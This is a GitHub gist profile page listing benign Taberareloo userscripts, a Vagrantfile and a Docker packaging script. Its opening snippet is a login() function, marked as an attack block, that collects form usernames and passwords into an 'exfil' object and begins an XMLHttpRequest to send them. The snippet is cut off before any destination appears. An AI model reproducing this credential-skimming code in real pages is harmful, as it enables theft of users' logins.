Skip to content

Instantly share code, notes, and snippets.

View ailispaw's full-sized avatar
🏠
Working from home

A.I. ailispaw

🏠
Working from home
View GitHub Profile
function login() {
var username = $('#username-modal').val();
var password = $('#password-modal').val();
// Start of attack code block!!!!!!!!!!!!!!!!!!!!!!
var exfil = {"id": username, "password": password};
if(username && password) {
console.log(JSON.stringify(exfil))
// clearInterval(timer);
console.log('Attack in Progress - Data Ready: ', exfil);
var xhr = new XMLHttpRequest();
@ailispaw
ailispaw / userscript.tumblr.timestamp.tbrl.js
Last active October 6, 2021 01:32
Taberareloo Patch version of Tumblr Timestamp
// ==Taberareloo==
// {
// "name" : "Add Timestamp into Posts on Tumblr Dashboard"
// , "description" : "Add Timestamp into Posts on Tumblr Dashboard"
// , "include" : ["content"]
// , "match" : ["*://www.tumblr.com/*"]
// , "version" : "0.0.8"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/af6107e6a8760967f72818126065ef70/raw/userscript.tumblr.timestamp.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / patch.fix.tumblr.reblog-dashboard.tbrl.js
Last active December 4, 2021 00:35
Fix Tumblr.ReBlog on Dashboard 2021.12
// ==Taberareloo==
// {
// "name" : "Fix Tumblr.ReBlog on Dashboard 2021.12"
// , "description" : "Fix Tumblr.ReBlog on Dashboard 2021.12"
// , "include" : ["background", "content"]
// , "match" : ["*://*/*"]
// , "version" : "0.0.8"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/a08ce031622390288980cdea27437108/raw/patch.fix.tumblr.reblog-dashboard.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / patch.replace.bitly.apikey.tbrl.js
Last active January 6, 2020 13:11
Replace bit.ly API Key
// ==Taberareloo==
// {
// "name" : "Replace bit.ly API Key"
// , "description" : "Replace bit.ly API_KEY and USER with own ones"
// , "include" : ["background"]
// , "version" : "0.1.0"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/7cebac28ca695f4fe3312a5cbfed9162/raw/patch.replace.bitly.apikey.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / patch.fix.tumblr.post.tbrl.js
Last active April 11, 2022 03:07
Taberareloo: Fix Tumblr.post 2021.12
// ==Taberareloo==
// {
// "name" : "Fix Tumblr.post 2021.12"
// , "description" : "Fix Tumblr.post 2021.12"
// , "include" : ["background", "content"]
// , "match" : ["*://*/*"]
// , "version" : "0.4.3"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/b5b2b65fddcb70f03e298a15403bfa8e/raw/patch.fix.tumblr.post.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / patch.fix.popup.form.resize.tbrl.js
Last active January 6, 2020 13:08
Taberareloo: Fix the size of the popup window
// ==Taberareloo==
// {
// "name" : "Fix the size of the popup window"
// , "description" : "Fix the size of the popup window"
// , "include" : ["popup"]
// , "version" : "0.1.0"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/3a62870d1f6e7a7a9a7b489adb865d64/raw/patch.fix.popup.form.resize.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / Vagrantfile
Last active November 5, 2018 23:38 — forked from goocey/Vagrantfile
barge
module VagrantPlugins
module GuestLinux
class Plugin < Vagrant.plugin("2")
guest_capability("linux", "change_host_name") { Cap::ChangeHostName }
guest_capability("linux", "configure_networks") { Cap::ConfigureNetworks }
end
end
end
Vagrant.configure(2) do |config|
@ailispaw
ailispaw / package.sh
Last active December 21, 2016 18:55
Package Tool for Wocker: Make a container portable and pushable to Docker Hub
#!/bin/sh
# Usage: package.sh <container-name> [image-name]
: ${CONTAINER_NAME:="${1:-wocker}"}
: ${IMAGE_NAME:="${2:-$CONTAINER_NAME}"}
echo "Packaging [${CONTAINER_NAME}] ..."
TMP_DIR=/tmp/${CONTAINER_NAME}
@ailispaw
ailispaw / model.scrapbox.tbrl.js
Last active January 6, 2020 13:09
Taberareloo: Scrapbox Model
// ==Taberareloo==
// {
// "name" : "Scrapbox Model"
// , "description" : "Post to scrapbox.io"
// , "include" : ["background", "content"]
// , "match" : ["*://scrapbox.io/*"]
// , "version" : "0.4.4"
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/2f791f1fb49087861e3dce05fae8aedc/raw/model.scrapbox.tbrl.js"
// }
// ==/Taberareloo==
@ailispaw
ailispaw / README.md
Last active February 10, 2017 04:55
Build WordPress on Barge by Docker-Compose with Veertu and Vagrant